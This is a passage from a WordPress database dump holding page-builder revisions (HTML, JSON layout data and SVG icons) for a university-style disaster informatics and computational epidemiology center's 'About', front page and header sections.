class=\"h-global-transition-all h-heading style-324 style-local-122-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-324 style-local-122-c18\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Our Mission</h3>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"122-c19\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c19 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c20-outer\">\n            <div data-colibri-id=\"122-c20\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c20 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-319 style-local-122-c21 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n                      to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 18:28:59','2022-02-16 18:28:59','',122,'https://gsudice.dataconn.net/?p=389',0,'revision','',0),(395,1,'2022-02-16 18:34:57','2022-02-16 18:34:57','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c24\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c24\",\"index\":0,\"id\":\"20-c25\",\"partialId\":20,\"styleRef\":330,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas\"}}],\"styleRef\":329,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 18:34:57','2022-02-16 18:34:57','',168,'https://gsudice.dataconn.net/?p=395',0,'revision','',0),(396,1,'2022-02-16 18:34:57','2022-02-16 18:34:57','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">Impact assessment</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-329-outer style-local-20-c24-outer\">\n      <div data-colibri-id=\"20-c24\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-329 style-local-20-c24 position-relative\">\n        <!---->\n        <!---->\n        <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n          <!---->\n          <div data-colibri-id=\"20-c25\" class=\"h-global-transition-all h-heading style-330 style-local-20-c25 position-relative h-element\">\n            <!---->\n            <div class=\"h-heading__outer style-330 style-local-20-c25\">\n              <!---->\n              <!---->\n              <h1 class=\"\">Focus Areas</h1>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 18:34:57','2022-02-16 18:34:57','',20,'https://gsudice.dataconn.net/?p=396',0,'revision','',0),(397,1,'2022-02-16 18:34:57','2022-02-16 18:34:57','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 18:34:57','2022-02-16 18:34:57','',23,'https://gsudice.dataconn.net/?p=397',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (398,1,'2022-02-16 18:34:57','2022-02-16 18:34:57','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" 